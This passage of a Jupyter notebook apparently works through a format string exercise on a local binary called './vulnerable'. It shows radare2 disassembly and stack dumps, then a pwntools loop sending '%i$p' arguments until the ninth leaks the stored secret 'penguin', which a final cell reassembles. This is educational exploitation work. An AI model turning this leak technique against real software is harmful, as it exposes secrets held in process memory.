eax\u001b[0m\u001b[0m\u001b[0m \u001b[37m; [15] --r-- section size 4 named .rodata\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b2\u001b[0m \u001b[37m02\u001b[32m00\u001b[0m \u001b[33madd\u001b[36m al\u001b[0m,\u001b[36m byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection_end..rodata:\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection..eh_frame_hdr:\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection.GNU_EH_FRAME:\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36m__GNU_EH_FRAME_HDR:\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b4\u001b[0m \u001b[37m01\u001b[37m1b\u001b[0m \u001b[33madd dword\u001b[36m \u001b[0m[\u001b[36mrbx\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m ebx\u001b[0m\u001b[0m\u001b[0m \u001b[37m; [35] m-r-- section size 60 named GNU_EH_FRAME\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b6\u001b[0m \u001b[37m03\u001b[33m3b\u001b[0m \u001b[33madd\u001b[36m edi\u001b[0m,\u001b[36m dword\u001b[36m \u001b[0m[\u001b[36mrbx\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006b8\u001b[0m \u001b[33m38\u001b[32m00\u001b[0m \u001b[36mcmp byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[31m ; [0x2:1]=255\u001b[31m ; 2\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006ba\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006bc\u001b[0m \u001b[37m06\u001b[0m \u001b[1;31minvalid\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006bd\u001b[0m \u001b[32m00\u001b[32m00\u001b[0m \u001b[33madd byte\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m al\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006bf\u001b[0m \u001b[32m00\u001b[37mcc\u001b[0m \u001b[33madd\u001b[36m ah\u001b[0m,\u001b[36m\u001b[36m cl\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006c1\u001b[0m \u001b[37mfd\u001b[0m \u001b[37mstd\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006c2\u001b[0m \u001b[31mff\u001b[0m \u001b[1;31minvalid\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x004006c3\u001b[0m \u001b[31mff\u001b[37m94\u001b[32m00\u001b[32m00\u001b[32m00\u001b[37m0c\u001b[37m.\u001b[0m \u001b[1;32mcall qword [rax + rax - 0x1f40000]\u001b[0m\u001b[0m\n", "\n" ] } ], "source": [ "print(r2.cmd(\"px @ rsp\"))\n", "print(r2.cmd(\"dr\"))\n", "print(r2.cmd(\"pd\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Looking at the output from above, the secret is at 0x7fff42732608 while the rsp is at 0x7fff427325f0. With the format string bug, if we read 32 bytes off the stack the last 8 will correspond to our secret." ] }, { "cell_type": "code", "execution_count": 8, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n", "\u001b[32m0x7ffcf638f638\u001b[0m \u001b[32m00\u001b[0m\u001b[33m70\u001b[0m \u001b[33m65\u001b[0m\u001b[33m6e\u001b[0m \u001b[33m67\u001b[0m\u001b[33m75\u001b[0m \u001b[33m69\u001b[0m\u001b[33m6e\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[32m.\u001b[0m\u001b[33mp\u001b[0m\u001b[33me\u001b[0m\u001b[33mn\u001b[0m\u001b[33mg\u001b[0m\u001b[33mu\u001b[0m\u001b[33mi\u001b[0m\u001b[33mn\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\n", "\u001b[32m0x7ffcf638f648\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f658\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f668\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f678\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f688\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f698\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6a8\u001b[0m \u001b[32m00\u001b[0m\u001b[37mdc\u001b[0m \u001b[33m7c\u001b[0m\u001b[37mdd\u001b[0m \u001b[32m00\u001b[0m\u001b[37m9c\u001b[0m \u001b[33m64\u001b[0m\u001b[33m5a\u001b[0m \u001b[33m30\u001b[0m\u001b[37m06\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m|\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33md\u001b[0m\u001b[33mZ\u001b[0m\u001b[33m0\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6b8\u001b[0m \u001b[37m97\u001b[0m\u001b[37mcb\u001b[0m \u001b[37me3\u001b[0m\u001b[37mc0\u001b[0m \u001b[33m3b\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m;\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6c8\u001b[0m \u001b[37m98\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37m80\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6d8\u001b[0m \u001b[37ma7\u001b[0m\u001b[37m05\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6e8\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37mf0\u001b[0m\u001b[37m9f\u001b[0m \u001b[33m51\u001b[0m\u001b[37m10\u001b[0m \u001b[37mec\u001b[0m\u001b[33m2b\u001b[0m \u001b[37mc0\u001b[0m\u001b[37m04\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33mQ\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m+\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6f8\u001b[0m \u001b[37m90\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f708\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37m10\u001b[0m\u001b[33m7e\u001b[0m \u001b[37ma0\u001b[0m\u001b[37mfc\u001b[0m \u001b[37m15\u001b[0m\u001b[37md4\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m~\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\n", "\u001b[32m0x7ffcf638f718\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37m0e\u001b[0m\u001b[37m05\u001b[0m \u001b[37m16\u001b[0m\u001b[37m91\u001b[0m \u001b[37m9b\u001b[0m\u001b[37md5\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f728\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\n" ] } ], "source": [ "print(r2.cmd(\"px @ rsp+24\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Ooooo, OK so we see our secret, \"penguin\", is on the stack. Next, I iterate across my parameters using `%i$p`, where \"i\" is the index of my parameter. Once I hit the 9th parameter, I find my secret:" ] }, { "cell_type": "code", "execution_count": 9, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21169\n", "Starting local process './vulnerable': pid 21169\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21169)\n", "Process './vulnerable' stopped with exit code 0 (pid 21169)\n", "1 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21170\n", "Starting local process './vulnerable': pid 21170\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21170)\n", "Process './vulnerable' stopped with exit code 0 (pid 21170)\n", "2 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21171\n", "Starting local process './vulnerable': pid 21171\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21171)\n", "Process './vulnerable' stopped with exit code 0 (pid 21171)\n", "3: ,��8�\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21172\n", "Starting local process './vulnerable': pid 21172\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21172)\n", "Process './vulnerable' stopped with exit code 0 (pid 21172)\n", "4 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21173\n", "Starting local process './vulnerable': pid 21173\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21173)\n", "Process './vulnerable' stopped with exit code 0 (pid 21173)\n", "5: 1\u0003\u0011\u001d", "�\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21174\n", "Starting local process './vulnerable': pid 21174\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21174)\n", "Process './vulnerable' stopped with exit code 0 (pid 21174)\n", "6: �pX\u0016�\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21175\n", "Starting local process './vulnerable': pid 21175\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21175)\n", "Process './vulnerable' stopped with exit code 0 (pid 21175)\n", "7 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21176\n", "Starting local process './vulnerable': pid 21176\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21176)\n", "Process './vulnerable' stopped with exit code 0 (pid 21176)\n", "8 skipped...\n", "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21177\n", "Starting local process './vulnerable': pid 21177\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21177)\n", "Process './vulnerable' stopped with exit code 0 (pid 21177)\n", "9: niugnep\u0000\n" ] } ], "source": [ "from pwn import *\n", "import binascii\n", "for i in range(1,10):\n", " cur_process = process([\"./vulnerable\", \"%{}$p\".format(i)])\n", " output = cur_process.recv(1024)\n", " try:\n", " print(\"{}: {}\".format(i, binascii.unhexlify(output.replace(\"0x\", \"\"))))\n", " except Exception:\n", " print(\"{} skipped...\".format(i))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Now we have the secret - we need to unjumble it!" ] }, { "cell_type": "code", "execution_count": 10, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[x] Starting local process './vulnerable'\n", "Starting local process './vulnerable'\n", "[+] Starting local process './vulnerable': pid 21178\n", "Starting local process './vulnerable': pid 21178\n", "[*] Process './vulnerable' stopped with exit code 0 (pid 21178)\n", "Process './vulnerable' stopped with exit code 0 (pid 21178)\n", "\u0000penguin\n" ] } ], "source": [ "cur_process = process([\"./vulnerable\", \"%9$p\"])\n", "jumbled = binascii.unhexlify(cur_process.recv(1024).replace(\"0x\", \"\"))\n", "ordered = []\n", "for i in range(len(jumbled) / 4):\n", " start = i * 4\n", " end = start + 4\n", " ordered.append(jumbled[start:end][::-1])\n", "print(\"\".join(ordered[::-1]))" ] }, { "cell_type": "code", "execution_count": 11, "metadata": {}, "outputs": [], "source": [ "r2.quit()" ] } ], "metadata": { "kernelspec": { "display_name": "Python 2", "language": "python", "name": "python2" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 2 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython2", "version": "2.7.15+" } }, "nbformat": 4, "nbformat_minor": 2 }